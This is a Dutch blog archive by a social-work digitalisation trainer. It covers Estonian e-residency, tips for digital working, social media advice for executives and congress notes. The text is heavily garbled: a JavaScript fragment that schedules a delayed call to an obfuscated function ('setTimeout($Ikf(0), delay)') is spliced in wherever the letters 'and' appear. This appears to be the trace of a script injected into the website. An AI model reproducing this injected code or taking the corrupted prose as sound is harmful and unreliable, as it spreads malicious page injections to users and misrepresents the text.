Tag archieven: blog

Wat levert het op?

Sociaal maatschappelijke organisaties inspireren en stimuleren om de kansen van sociale media / sociale technologie en digitale vaardigheid te pakken. Ik help graag bij het accepteren, innoveren en implementeren. Social media opleiding in zorg en welzijn, trainer, workshops en nascholing, coach, adviseur, blogs, columns, spreker en straks een boek (!).

Welke kansen zijn er dan te pakken? Wat levert het je op?
* Digitaal bouwen aan duurzame relaties met je deelnemers / cliënten.
* Het goede imago van je dienstverlening onder inwoners ook online voortzetten.
* Raadsleden betrekken bij je dagelijkse werk.
* Jullie herkenbaarheid in de samenleving vergroten.
* Rechtstreekse lijntjes met de wethouder en beleidsambtenaren leggen.
* Ketenpartners in de wijken vinden en binden.
* Bevorderen van mond op mond reclame, maar dan via social media.
* Tijd besparen door 1 super leuk bericht te plaatsen inplaats van 1001 foldertjes in de bus te doen.
* Standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaard informatie digitaal aanbieden om tijd te besparen en je klant beter te helpen.

Mijn klanten vinden het een groot pluspunt dat ik “uit het wereldje zelf kom.” Ik spreek de taal van de sector en ken de mores. Ik help je om digitale middelen zoals social media te borgen in je dagelijkse werk, zodat het bijdraagt om jouw werkdoelen te behalen t.b.v. je cliënt / bewoner / doelgroep. Met Welzijn 3.0 help ik jou en je collega’s graag verder.

Welzijn 3.0 is geaccrediteerd door Registerplein.nl en CRKBO (Centraal Register Kort Beroepsonderwijs). KvK nummer: 52059855. Ik sta als sociaal werker geregistreerd bij Registerplein. Beschikbaar voor korte en langere opdrachten.

Ik ben Hans Versteegh. Ik heb ruim 25 jaar lang ervaring in de uitvoering binnen het sociaal domein. Waarvan veel jaren als opbouwwerker, een prachtig vak. Nog steeds val ik af en toe in en sta ik als sociaal werker geregistreerd bij Registerplein. Op de werkvloer ontdekte ik de kansen van digitalisering voor dit bijzondere veld. En tegelijk kwam ik allerlei drempels en overtuigingen tegen die deze innovatieve ontwikkeling tegenhouden.

Vinden jij en je collega’s dat spannend? Dat snap ik. Zouden jullie daar hulp bij willen hebben? Om digitale middelen zoals social media te borgen in je dagelijkse werk, zodat het helpt om jouw werkdoelen te behalen t.b.v. je cliënt / bewoner / doelgroep? Met Welzijn 3.0 help ik jou en je collega’s graag verder.

 

e-Inwoner van Estlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and

andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and.png” alt=”” width=”682″ height=”398″ />Wat zijn we toch aan het prutsen. Estlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and is het meest gedigitaliseerde landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and van de wereld. Iedere Est, en dat zijn er 1.3 miljoen, heeft een e-identiteit. Sterker, iedereen in de wereld kan die aanvragen, je wordt dan een e-ingezetene van Estlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and. Geen fysieke echte ingezetene, met stemrecht, maar gebruiker van een super veilig internet waarin jij de regie hebt over alles wat er online over je bekend is.

Hier is dat andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders.
Sinds de decentralisatie heeft iedere gemeente zijn eigen vorm van sociaal domein opgezet. Met een eigen vorm van sociaal wijkteam. Met een eigen ingekocht registratiesysteem (leuk voor de ICT leveranciers, die daar goed aan verdienen, ten kosten van ons belastinggeld). Met per gemeente eigen eisen op het gebied van registratie, verantwoording en beschikbaar stellen van budgetten. Wat er voor zorgt dat grote organisaties met meerdere gemeenten als klant extra mensen aan hebben moeten trekken om aan die wirwar van eisen te kunnen voldoen. Waardoor minder geld beschikbaar is voor de core business: hulp verlenen. Met om de paar jaar een heel circus om; wat even werkte na een aanloopperiode; weer net zo makkelijk overboord te kieperen met aanbestedingen en het wiel met nieuwe spelers opnieuw uit te vinden.

Ten koste van werkers, die geen baanzekerheid hebben. Ten koste van burgers die met nieuwe dienstverleners te maken krijgen en dus niet verzekerd zijn van zorg die ze soms wel heel hard nodig hebben. En ten koste van onze gegevens (data), die we in handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden geven van een overheid die om de paar jaar die gegevens aan weer andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere spelers moet leveren om ons zorg te kunnen blijven leveren. Lekker betrouwbaar.

Nou is er een voordeel: doordat we in Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and zo’n uiterst versnipperd landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andschap hebben met ingebouwde bugs, is de schade als het fout gaat enigszins beperkt. Er is geen almachtige big brother die alles bepaalt. Er zijn ongeveer net zo veel big brothers als dat we gemeenten hebben en die kijken alleen naar de mensen die daar toevallig wonen.

Heb je het stempel “u bent kwetsbaar” in de ene gemeente, omdat je ooit contact had met het plaatselijke wijkteam, maar ga je verhuizen naar de andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere, dan kan je daar met een schone lei opnieuw beginnen. Gegevens worden niet over gedragen. Systemen passen niet in elkaar, Data kan niet worden overgedragen, ten minste, niet zonder fysiek handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andwerk. En daar is geen tijd voor. Verhuis je, dan ben je letterlijk uit beeld. Je reset je situatie.

Onze overheid is op dit moment de meest onbetrouwbare partner voor de opslag van gegevens van burgers die je maar kan bedenken. Naast versnippering is er geen regie en al helemaal geen eensluidend systeem a la Estlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and dat we als inwoners van dit landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and kunnen vertrouwen. Er wordt geprutst met DigiD, datalekken met gestolen laptops, miljarden flops van ICT systemen die niet werken. Sociaal werkers die data produceren maar geen idee hebben waar die gegevens heen gaan en wie ze in kan zien. En geen mens die daar verantwoording voor draagt. We halen onze schouders op en dealen met de situatie.

Dat hebben ze in Estlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and heel andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders aangepakt. Dat moet ook wel, want in 2007 legde Ruslandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and, voormalige bezetter, het hele landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and compleet stil via een ICT aanval. En dat zou zo maar weer kunnen gebeuren. De Russen doen dat nu in Oekraïne. Dus hebben de Esten een systeem opgezet dat betrouwbaar is, eenvoudig voor de gebruiker, met backups op meerdere plekken en met een leger dat ook online klaar staat om aanvallen af te slaan. En iedereen kan daar ingezetene van worden zodat, als de Russen weer komen, de hele wereld direct getuige is en zal gaan schreeuwen dat de Russen weg moeten wezen. Soft power noemen ze dat.

Wat wij hier nog het beste op orde hebben is het online bank-systeem. Om klanten zo ver te krijgen dat die online gingen bankieren konden zij niet andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders dan tot het uiterste gaan om een superbetrouwbaar veilig systeem op te zetten dat bankieren mogelijk maakt. Anders was geen hond er aan begonnen en zaten we nu nog overschrijf-briefjes in te vullen.

Kunnen we ook zo iets voor ons sociaal verkeer inrichten?

Lees ook: https://www.welzijn30.nl/manifest-voor-de-digitaal-sociaal-werker/

 

BewarenBewaren

7 tips voor succesvol digitaal werken

7 tips voor succesvol digitaal werken? Ja, want digitaal werken is vaak een verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andering. Mijn email en webinar van vorige week ging daar ook over. Verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderingen vragen om implementatie in het dagelijks werk. En daar wordt het nog wel eens lastig. Want: Hoe pak je dat aan? Vandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaag geef ik je de 7 tips om succesvol digitaal te werken. Implementeren en zo dus verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen. Ga je, zoals ik deed toen niemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and er nog mee bezig was, gewoon beginnen? Of … pak je digitaal werken op structurelere manier aan? Een die wel goed bij jou past!

In dit blog lees je:

 • Why? Urgentie van digitaal werken
 • What? Wat wordt er van jou verwacht
 • How? 7 tips voor succesvol digitaal werken
 • Hoe ik je daar bij help

Ik hoop je als sociaal werker te inspireren de kansen van social media en digitaal werken te ontdekken. En wel hierom:

 • Jezelf en je vak te ontwikkelen
 • Relevant te blijven in de samenleving
 • Aan te blijven sluiten bij je doelgroep
 • In te spelen op nieuwe hulpvragen
 • Zichtbaar te zijn als trotse werker!

Why? De urgentie

 • In Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and gebruikt 98% social media / internet
 • Kijk naar jezelf, wat doe jij al allemaal online?
 • Je doelgroep is vast -ook- al online
 • eOverheid en het bedrijfsleven zijn steeds meer digitaal
 • Het is lastig participeren zonder digitale vaardigheden
 • Met mediawijsheid het hoofd bieden aan digitale geletterdheid en de digitale kloof helpen verkleinen

How? Wat wordt er van jou verwacht?

 • Dat je er als werker minimaal zelf de weg in weet
 • Dat je andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen hier mee kan helpen
 • Kennis van nieuwe hulpvragen en oplossingen
 • Nieuwe manieren van (samen-) werken ontwikkelen
 • Nieuwe diensten ontwikkelen
 • Anders communiceren

Dat wordt onder meer zichtbaar in de recentelijk verschenen “Competenties sociaal maatschappelijk werk” en het “Landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelijk opleidingsdocument sociaal werk” Het eerste gaat over wat er van jou, als werker wordt verwacht. Het tweede is het basisdocument waar sociaal werk opleidingen hun nieuwe onderwijsinhoud op gaan schrijven. In beide is aandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andacht voor digitalisering van het vakgebied. Er worden nu digitale eisen gesteld aan nieuwe en bestaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande sociaal werkers!

What? Aan de slag

Ga je gewoon beginnen of …? Nee, dat hoeft niet. Ik heb hier een handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andreiking voor je.

7 tips voor succesvol digitaal werken!

7 tips die eigenlijk niet over digitaal werken op zich gaan, maar wel op het verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderingstraject dat implementeren van digitaal werken van je vraagt. Het digitaal werken zelf geef je gaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeweg dit traject zelf vorm.

1. Doel stellen.
Wat wil jij met digitaal werken bereiken?

2. Gemotiveerd worden.
Waar haal jij je energie uit? Wat motiveert jou om digitaal te gaan?

3. Door moeilijke momenten heen komen.
Verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen kost moeite. Wat zijn voor jou momenten dat het even tegen zit en hoe kan jij je daar op voor bereiden?

4. Haalbare stapjes maken.
Je grote doel opknippen in kleinere subdoelen.

5. Anderen er bij betrekken.
Het helpt wanneer je collega’s met je mee doen of weten waar je mee bezig bant. Zij kunnen je door de moeilijke momenten heen helpen.

6. Reflecteren.
Op wat je hebt bereikt, wat je daarvan leert en hup, weer verder.

7. Belonen.
Geef jezelf bij het bereiken van mijlpalen een beloning! Vier je succes, altijd.

Jij bent “in controll” maar ik help je daarbij.

De 7 tips voor succesvol digitaal werken van hierboven vormen de basis van de ontwikkeltrajecten van Welzijn 3.0. Daarin gaat het vooral om jou en de verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andering die jij doormaakt:

 • Jij bepaalt zelf de belangrijkste resultaten
 • Je stelt leerdoelen die jou en je collega’s ondersteunen
 • Jij bepaalt het tempo
 • Ik begeleid je in dat proces met (online) intervisie en coaching
 • Individueel, of incompany, bij jou op de werkvloer
 • Extra: een ontwikkeltraject van 6 maandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden geeft recht op registerpunten bij Registerplein.nl
 • Meer info op https://www.welzijn30.nl/ontwikkeltraject/

Is dat iets voor jou?

Of voor jou en je collega’s? Over twee weken, op 2 oktober, starten we met de nieuwe reeks ontwikkeltrajecten. Het doel is om tegen kerst de eerste resultaten al te kunnen vieren. Dat jij kan zeggen: “ik ben op de goede weg met het digitaliseren van mijn werk. Het wordt er makkelijker van.” Of … “Ik krijg steeds meer in de gaten dat social media handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andig is in de communicatie met mijn doelgroep en partners.”

Dat gun ik je in ieder geval!

Aanmelden

Vanaf 25 september kan jij je aanmelden. Die hele week is daar voor gereserveerd.

Meld je aan via https://www.welzijn30.nl/ontwikkeltraject/

En we kunnen op 2 oktober aan de slag. Bel me gerust als je meer wil weten op 0644062029. Je mag ook (Whats)appen. Of mailen naar info@welzijn30.nl

Ook als je nu al weet dat jij je verder wil ontwikkelen op digitaal gebied en er niet nog een week over na hoeft te denken, dan kan je dat natuurlijk al aangeven. Misschien sta jij dan binnenkort net zo trots op de foto als deze collega’s!

Tot snel!

Hans Versteegh / Welzijn 3.0


Lees ook:andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen-hoe-doe-je-dat/”> https://www.welzijn30.nl/verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen-hoe-doe-je-dat/

BewarenBewaren

BewarenBewaren

BewarenBewaren

BewarenBewaren

Blog voor Zorg en Welzijn, juli 2016: “Belangrijk voor bestuurders”

Vandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaag richt ik me tot u: bestuurder of lid van de Raad van Toezicht (RvT) van een sociaal/maatschappelijke organisatie. Zoals u weet inspireer, train en coach ik sociaal werkers om social media in te zetten in hun dagelijkse werk. Ik help uw medewerkers zich te profileren met al hun kennis expertise en persoonlijkheid, om daarmee een ambassadeur te zijn voor uw organisatie.

Videoboodschap

Maar dit verhaal gaat over u. Want hoe zit het met uw eigen belangstelling voor social media? Bent u er bijvoorbeeld zelf actief? Bent u te vinden op Twitter en LinkedIn? Schrijft u een extern gericht blog? Zet u videoboodschappen in naar uw medewerkers en partners waarin u zelf  in beeld bent?

Mediavaardig

Laten we eerlijk zijn: lang niet alle bestuurders zijn zelf mediavaardig en daardoor schatten ze de waarde voor de organisatie niet goed in. Met name in tijden van crisis hebben zij dan een probleem. Het zijn nu roerige tijden. Uw organisatie ligt onder een vergrootglas. Medewerkers vrezen voor hun baan en financiering is onzeker. Misschien gaat u wel meedingen in een aanbesteding? Of merkt u dat de concurrentie toeneemt?

Visitekaartje

Ik begrijp dat u het druk heeft. Toch vraag u even stil te staan bij de kansen die uw eigen profilering op social media u en uw organisatie kunnen brengen. In de huidige maatschappij gelden waarden als gelijkwaardigheid, delen, transparantie, flexibiliteit, ondernemerschap en benaderbaar zijn. Dat betekent voor u dat van u verwacht wordt dat u het visitekaartje van uw organisatie bent. U bent het gezicht van de organisatie. En het is dus ook aan u om te bouwen aan persoonlijke warme relaties, ook online.

Mens achter de functionaris

Persoonlijk? Jazeker, want we zijn allemaal mensen en heel erg benieuwd naar de andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander. Juist als bestuurder is het dus leuk om af en toe iets te laten zien van de mens achter de functionaris. Want klikt het met u als bestuurder, dan klikt het misschien ook wel met uw organisatie. Niet alleen om voor te werken, maar ook om klant van te worden.

Social Media plan

Ik daag u uit: Laat uzelf zien. Maak een social media plan. Want we willen natuurlijk geen vervelende reacties uitlokken. Uw communicatieafdeling kan u daarbij helpen, en andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders belt u mij maar. Maak vooral keuzes. Wat wilt u wel en wat wilt u niet van uzelf en uw privéleven openbaar maken?  Zoals minister Lodewijk Ascher ook heeft gedaan. Zijn plan is dit: ik ben een publiek figuur en vaak in functie, maar mijn kinderen mogen niet op de foto. En ik ben tussen 5 en 8 uur ’s avond niet aanspreekbaar. Ik hoop dat u nu niet denkt: “ach, dat zal mijn tijd wel duren.” Want die tijd, die is er nu al.

PS Lees je dit en ben je zelf geen bestuurder, dan geldt dit hele verhaal natuurlijk ook gewoon voor jou.

Blog voor Zorg en Welzijn, juni 2016, “Je hebt nog een half jaar.”

Ik heb laatst een sociaal werkster erg laten schrikken. Niet opzettelijk, maar wat ik zei kwam wel aan. Zozeer dat ze er weken later op terug kwam. Het had haar aan het denken gezet. Waar schrok ze zo van?

Competenties

Hoe staat het ermee? Heb jij ze allemaal onder de knie kunnen krijgen? Dan ben je Sociaal Werker van het jaar geworden zeker? Want de opstellers stellen zelf dat je de meeste waarschijnlijk wel beheerst, maar dat je aan de zwakkere nog kan werken. Oh, je bent ze vergeten? Nou, dit zijn ze nog een keer.

De sociaal werker:

 1. verheldert vragen en behoeften
 2. versterkt eigen kracht en zelfregie
 3. is zichtbaar en gaat op mensen af
 4. stimuleert verantwoordelijk en oplossingsgericht gedrag
 5. stuurt aan op betrokkenheid en participatie
 6. verbindt individuele en gemeenschappelijke vragen en potenties
 7. werkt samen en versterkt netwerken
 8. beweegt zich tussen verschillende werelden en culturen
 9. signaleert en speelt in op verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderingen
 10. is ondernemend en benut professionele ruimte

Ook staat – tot mijn vreugde- in het rijtje “Methodische kennis,” tussen Er op af! en de Presentiebenadering, expliciet de inzet van social media genoemd.

Social media

De sociaal werkster schrok toen ik in haar social media coaching “Hoe krijg je het in je systeem?” nog eens onderstreepte waarom het zo belangrijk is om jezelf online te laten zien, je te profileren.

 1. Zoals je hierboven leest wordt in deze sterk digitaliserende netwerkmaatschappij gewoon van jou verwacht dat je dit kan toepassen.
 2. Het is belangrijk dat beslissers en subsidieverstrekkers te zien krijgen wat cijfers in rapportages  niet kunnen duiden, namelijk dat je werk procesmatig is en soms van kleine succesjes aan elkaar hangt.
 3. Intern kan je als collega’s beter op de hoogte raken van ieders specialisme. Je ziet de kleine dingen, waar je niet over gaat bellen of mailen, maar die wel handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andig zijn om te weten.
 4. Maar vergeet ook je leidinggevende niet die over je functioneren oordeelt aan het eind van het jaar. Die moet ook zien wat jij allemaal gedaan hebt, toch?

Kortom, toen ik –uit eigen ervaring puttend– de conclusie trok dat social media er aan kan bijdragen of je straks wel of niet je baan nog hebt, werd ze getroffen door een bliksemschicht.  Zo had ze het nog niet bekeken!

Online profilering

Nu jij dit weet, heb jij vanaf nu nog een half jaar om jouw online profilering op poten te zetten. Richt je dan met name op competenties 3, 6, 7 en 10. Misschien heb je daar nog wel wat opleidingsbudget voor ook? Vraag het je leidinggevende. Door dat te doen kan je bij 10 alvast een vinkje zetten.

Succes!

Dat wil je toch niet?

Op internet kwam ik een video tegen. Amerikaanse tieners (16 en 17 jaar) die in 2015 voor het eerst met een computer met Windows 95 worden geconfronteerd. Op dat moment een besturingssysteem van 20 jaar eerder. Dus voor dat zij waren geboren. Hun reacties zijn hilarisch!

Maar …  herken jij dit?

“We kunnen geen geluid horen op onze PC’s.” “Ik kan geen filmpjes bekijken op m’n werk.” “Ons systeem kan dat niet aan.” “Ik kan Skype niet installeren.” “We kunnen niet op internet.” “Sommige sites zijn afgeschermd.” “Ik kan geen apps op mijn telefoon zetten.” “ik heb op mijn kantoor geen bereik.”

Hoe vaak kom ik niet in sociaal werk organisaties waar ik te horen krijg dat zij “nog niet zo ver zijn.” Dus ja, het filmpje is lachwekkend, maar de werkelijkheid van het sociaal domein is hier en daar nog best bedroevend.

Misschien helpt dit om je daar weer even op te wijzen en actie te ondernemen. Want … je klant is zeker weten al stukken verder dan jij! Die heeft namelijk thuis, net als jijzelf neem ik aan, wel wifi, mobieltjes, tablets en laptops.

Op je werk ben je ondertussen druk bezig de aansluiting met je klant / client / bewoner / partner, die dat vaak ook allemaal wel op orde hebben te verliezen, alleen omdat je niet de goede spullen in huis hebt? Doe normaal zeg! Hoe wil je dan je werk doen?

“Mijn doelgroep heeft dat andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders ook niet hoor.”  Zeggen die collega’s dan steevast. Want die kunnen nauwelijks lezen, hebben het geld niet, weten ook niet hoe een computer werkt, enz. Ik hoor het allemaal langskomen. En inderdaad, uitzonderingen zijn er altijd, maar steeds minder. Geen reden om je achter te verschuilen dus.

In mijn ogen zijn die geluiden juist een signaal aan jou, dat jij er voor moet gaan zorgen dat ze wel mee kunnen komen in de maatschappij. Door zelf een voorbeeld voor ze te zijn waaraan ze zich omhoog kunnen trekken, door ze die computervaardigheden wel aan te leren of door een informeel sociaal netwerk te creëren waarin iemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and met de juiste kennis ze daarin bij kan staan.

Want zeg nou zelf, je wil je toch zelf ook niet uitgelachen worden door een stel snotneuzen?

P.s. Als je de video leuk vond, kijk dan ook eens naar deze:

Sociale technologie is “Super cool!”

Dat was de reactie van mijn oudste dochter van 8 op wat er allemaal te zien en uit te proberen (!) is in het Permanent Future Lab in Utrecht. Maar hoe kwamen we daar verzeild?

MOVISIE organiseerde op 18 februari 2016 een -gratis- inspiratiemiddag rondom sociale technologie. Met verschillende interessante workshops waaronder een over de
nieuwste technologische snufjes. Met enthousiasme verzorgd door Jethro Hardeman en Evelyn Visschedijk .

Robot 1 en 2 Permanent Future Lab

Kleine robot vangt een grote

In een razend tempo kwamen aan de ordeKahoot waarmee je gaming in je lessituatie haalt, vertaal-apps voor communicatie met vluchtelingen, de vraag van de klant letterlijk in kaart brengen met heatmaps, het platform voor jongeren met eetstoornissen Proud2beme, de Muse; een mindfulness
sensor om mee te mediteren, de nieuwste virtual reality bril van HTC, leren met angsten om te gaan met Mindlight, stress meten aan de handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and van je huid met een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and”>wearable om je pols, communiceren via oplichtende en trillende stenen, en je eigen hulpverlener in Amsterdam vergelijken en uitkiezen. En om dit technologische geweld allemaal meteen maar weer te relativeren lieten ze dit komische filmpje zien.

De organisatoren van deze inspiratiemiddag vroegen de deelnemers hun belangrijkste inzicht te delen. Mij inzicht was dat mijn twee dochters van 4 en 8 niet lang zullen hoeven te wachten voor al deze technologie gangbaar, sociaal toepasbaar en geaccepteerd zal zijn.

3D printen Permanent Future lab

Met onze neus bovenop 3D-printen

De dingen die werden getoond zijn nu in ontwikkeling of zijn al op de markt. Mijn oudste wil bijvoorbeeld al een hoverboard en verzint terloops in de keuken, terwijl ik sta te koken, een vuilnisbak die van kleur verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderd zodra die vol is.

Dus het werd tijd dat deze spruit eens goed ondergedompeld werd in die steeds maar verder ontwikkelende wereld. En natuurlijk vind papa dat zelf ook bere-interessant!

Robot 3 Permanent Future Lab

Een aaibaar klein robotje

Op naar het Permanent Future Lab (video) in Utrecht dus.

Nooit van gehoord? Kan kloppen, het zit een beetje verstopt. Vlak bij Utrecht Centraal Station, inwonend bij Seats2meet. Ook nooit geweest? Oh, dat is zo’n plek waar je met je laptop crashed en cocreëert met al die andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere likeminded peoples die hun ding doen maar dat ook best willen delen om samen de wereld weer iets mooier te maken. Ik zit er zelf ook wel eens te werken.

Permanent Future Lab (artikel) is een van de drie plekken in Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and waar iedereen mag spelen met robots, sensoren, virtual reality brillen en 3D-priners. Een walhalla voor mijn dochter, die eerst wat aarzelend was maar al heel snel de smaak te pakken kreeg. Ze probeerde van alles uit, daarbij aangemoedigd door de super vriendelijke mensen van het lab, die ook niet te beroerd waren om alles uit te leggen.

Virtual reality box Permanent Future Lab

Super cool! Voor het eerst virtual reality ervaren.

En ook ik vond mijzelf terug, zwevend als astronaut op een ruimtewandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeling, terwijl vlak achter de enorme aardbol net de zon opkwam. Ik zag dat Europa nog in de nacht lag, met de lampjes van de grote steden duidelijk zichtbaar. Zo prachtig dat ik een selfie maakte. Natuurlijk niet echt. Maar virtueel reëel.

 

 

En dat is dan meteen het enige nadeel van dit bezoekje. Dochter wil nu natuurlijk ook een virtual reality bril, maar ik aarzel nog om daar 800 dollar op stuk te slaan. Gelukkig zijn ze er ook vanaf net geen 20 euro … van karton.

Jaarcongres ECP 2015, in het hart van digitalisering

Lees mijn aantekeningen door de dag heen (19 november 2015) van mijn deelname aan dit jaarlijks terugkerende congres in Den Haag. Ik doe verslag van de sessies die ik bijwoonde. Excuus voor de “hak op de tak” schrijfstijl. Niet alles was nu eenmaal even interessant. Wat je leest zijn echter wel de krenten uit de pap!

IMG_8250Sessie 1 Digivaardigheden toen, nu en straks

Een terugblik en vooruitblik op het aflopende publiek-privaatprogramma Digivaardig & Digiveilig, dat gaat stoppen hoewel aandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andacht voor deze onderwerpen onverminderd nodig blijft, aldus diverse sprekers.

Tip: kijk op het Digitaalhulpplein.nl. Doelgroep, verwijzers en trainers zijn er samen te vinden op 1 platform. Met 12.000 bezoekers in 2015. Niet vaardige mensen komen via hun netwerk en omgeving in aanraking met ondersteuners. Op Oefenen.nl kunnen ze trainen in lezen en schrijven. Soms blijkt dan dat digitale vaardigheden ook achterlopen.

Pleidooi van de dag (ja, nu al): hou je digitale vaardigheden bij zodat je regie hebt op je loopbaan.

Bekijk eens de site http://www.slimmerondernemenin1minuut.nl waarop bijna 30 korte modules staan die je kennispeil verhogen.  Met 11780 deelnemers die B2C, business to consumer, bereiken. Afleveringen onder abonnement voor zelf lerende MKB-ers. Ook op ondernemersplein.nl binnenkort. Want: ”Je bent nooit te oud om digivaardig te worden.”

E-skills zijn voor jongeren al bijna net zo belangrijk als lezen en schrijven. Hoe begrijp je andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders de wereld van nu. Daarom is er een landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelijke codeweek en hebben in Engelandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and kinderen sinds vorig jaar verplicht les in coderen op school.

Faye, een jonge meid met een vader die programmeert, vertelde dat ze op code-zomerkamp was geweest. Van http://digivita.nl/nieuw/ en speciaal  voor meisjes. Ze beweerde dat je vooral moet leren door te doen. Kijk bijvoorbeeld eens op http://lekkersamenklooien.nl voor ouders en kind.

Wil je echt aan de slag met coderen, programmeren en bouwen met je wat oudere kind / tiener, kijk dan eens op https://www.arduino.cc voor de toollkit. Wil je spelenderwijs leren programmeren dan is http://twolivesleft.com/CargoBot/ een aanrader. Je leert een robot pakjes verplaatsen op de iPad.

Faye was voorstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander van de “makers class” op haar school. Waar jongeren die snel door de reguliere stof heen gaan een lesaanbod krijgen dat uitdaagt. Maar ze wil eigenlijk dat iedere scholier dit kan volgen. Programmeren en techniek moet een standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaardvak worden.

Van de buurvrouw naast me, die hoorde dat ik dochters heb, kreeg ik deze tip: Project Prep is een boek voor “preppy girls” over mode, technologie, New York en L.O.V.E! Kijk op http://www.preptheproject.com/nl/

Via http://geefitdoor.nl geven IT-ers gastlessen op scholen. Mentoren en docenten kampen met een kennisachterstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and en weten bovendien vaak niet wat het IT niveau is van hun leerlingen. De term ICT schrikt af maar is overal aanwezig.

IMG_8238

Tineke Netelenbos, voorzitter van ECP zei dat digivaardigheid stimuleren nodig blijft. Er zijn tal van stimulerende hulpmiddelen en sites. Maar de vindbaarheid van die digitale hulpmiddelen is nog wel een probleem. Zegt het dus voort.

Zij pleit er voor om talentvolle jongeren een rol te geven in het ontwikkelen van vernieuwende programma’s in het onderwijs. Bovendien, zo stelt zij, is een leven lang leren juist nu zo nodig. Het programma digivaardig en digiveilig stopt maar de aandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andacht hiervoor mag niet verslappen. Op http://www.eskillsforjobs.nl zijn Europese stimuleringsprogramma’s te volgen.

Sessie 2 Digivaardigheden in de praktijk

Gemeente en Bibliotheek: samen sterk met het Digitaal Hulpplein
Met Heleen Kist van digitaalhulpplein.nl, Maaike Toonen Van de KoninklijIMG_8239ke Bibliotheek en Lianne Knobel van Bibliotheek Breda..

De Koninklijke Bibliotheek is de landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelijke koepel. Daaronder zijn er de POI’s die lokale bibliotheken ondersteunen. En als aflastte laag dus die lokalen bibliotheken, vaak gefinancierd door de Gemeenten.

Bibliotheken willen het vangnet vormen voor digitale vaardigheden en positioneren zich nadrukkelijk als centrum van het sociale domein, als het gaat om participatie, werk en gezin. Of zoals bleek: het zijn educatief maa
tschappelijke centra met cursussen.

Er lopen diverse programma’s en samenwerkingsverbandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden. Bijvoorbeeld het Tel mee net Taal programma over sociale inclusie en Klik&Tik, computervaardigheden. De Bieb, het UWV en ROC’s werken samen. Maar ook met St. Lezen en Schrijven, ECP, BZK, OCW, SZW, Seniorweb, Belastingdienst.

